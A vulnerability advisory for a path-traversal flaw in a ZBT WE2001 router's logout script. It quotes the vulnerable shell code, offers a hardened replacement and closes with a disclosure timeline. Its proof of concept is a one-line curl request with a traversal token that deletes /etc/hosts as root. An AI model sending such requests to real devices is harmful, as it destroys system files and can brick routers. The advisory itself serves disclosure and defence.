Summary
A path-traversal vulnerability in the logout functionality of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows remote attackers to delete arbitrary files on the host by supplying a crafted session cookie value.
Details
The vulnerability exists in the logout operation within the webapi shell script. The application uses the access_token parameter to construct a file path for deletion without proper validation or sanitization.
The following webapi code extract demonstrates how the user input FORM_access_token (access_token) is directly concatenated into the rm command:
```sh
if [ "$op" == "logout" ];then
	if [ -n "$FORM_access_token" ];then
		# FORM_access_token is taken from the request and used unsanitized
		rm /tmp/webapi_token/session/${FORM_access_token}
	fi
	json_init
	json_add_string code "1"
	json_add_string reason "success"
	echo -n "$(json_dump)"
fi
```
The script intends to delete a session file located inside /tmp/webapi_token/session/. However, because the rm command accepts the ${FORM_access_token} variable without filtering for directory traversal characters, an attacker can manipulate the path to point to any file on the system.
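A hardened form of the same logout branch, added here as an illustration and not taken from the vendor's webapi script; the function names, the allow-list pattern and the optional directory argument are this example's own assumptions:

```sh
#!/bin/sh
# Added example, not vendor code: a hardened replacement for the logout branch.
# The token is validated as a single safe path component before any rm runs.

# Return 0 if TOKEN is 1-64 characters of [A-Za-z0-9_-], 1 otherwise.
# This allow-list rejects '/', '.', '..', empty strings, whitespace and shell
# metacharacters, so no traversal sequence can reach rm.
token_is_safe() {
    case "$1" in
        '' | *[!A-Za-z0-9_-]*) return 1 ;;
    esac
    [ "${#1}" -le 64 ]
}

# Delete the session file for TOKEN inside DIR (defaults to the directory used
# by the vulnerable script). Returns 0 on success, 1 if the token is rejected or
# no regular session file exists; never touches anything outside DIR.
delete_session() {
    token="$1"
    dir="${2:-/tmp/webapi_token/session}"
    token_is_safe "$token" || return 1
    target="$dir/$token"
    # Defence in depth: only remove a regular, non-symlink file, and pass '--'
    # so a token can never be parsed as an rm option.
    { [ -f "$target" ] && [ ! -L "$target" ]; } || return 1
    rm -- "$target"
}

# Demonstration against a scratch directory (constructed here, not the device's
# real /tmp/webapi_token/session).
demo() {
    scratch=$(mktemp -d)
    touch "$scratch/abc123"
    delete_session abc123 "$scratch" && echo "valid token: session file removed"
    delete_session '../../../etc/hosts' "$scratch" || echo "traversal token: rejected"
    rmdir "$scratch"
}
demo
```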
Prerequisites:
For the traversal to successfully step out of the directory tree, the base path /tmp/webapi_token/session/ must exist. In a default installation, this directory is automatically created when at least one valid session is active. Therefore, the vulnerability relies on the presence of this temporary directory structure to serve as a pivot point.
PoC
To reproduce this vulnerability, an attacker can send a crafted HTTP request, via either GET or POST, using nothing more than curl.
In this case the payload uses path traversal sequences to step up from the session directory to the filesystem root and delete the /etc/hosts file.
```sh
PATH_TO_FILE="/etc/hosts"
curl --path-as-is -k "http://192.168.1.1/cgi-bin/webapi?op=logout&access_token=../../..${PATH_TO_FILE}"
```
Impact
Attackers can arbitrarily delete critical application data, configuration files, or even system binaries and boot configurations, rendering the device completely unbootable and resulting in a Permanent Denial of Service. Since the webapi CGI script runs with root privileges, the vulnerability allows the deletion of any file on the filesystem regardless of permissions.
At the time of this publication, there is no official patch or remediation available from the vendor.
Disclosure Timeline
| Date | Event |
| --- | --- |
| 2025-10-23 | Initial report sent to MITRE. |
| 2025-11-12 | CVE ID reserved/assigned by MITRE. |
| 2026-02-11 | Public disclosure. |
Credits
Adrià Pérez Montoro (b1n4ri0)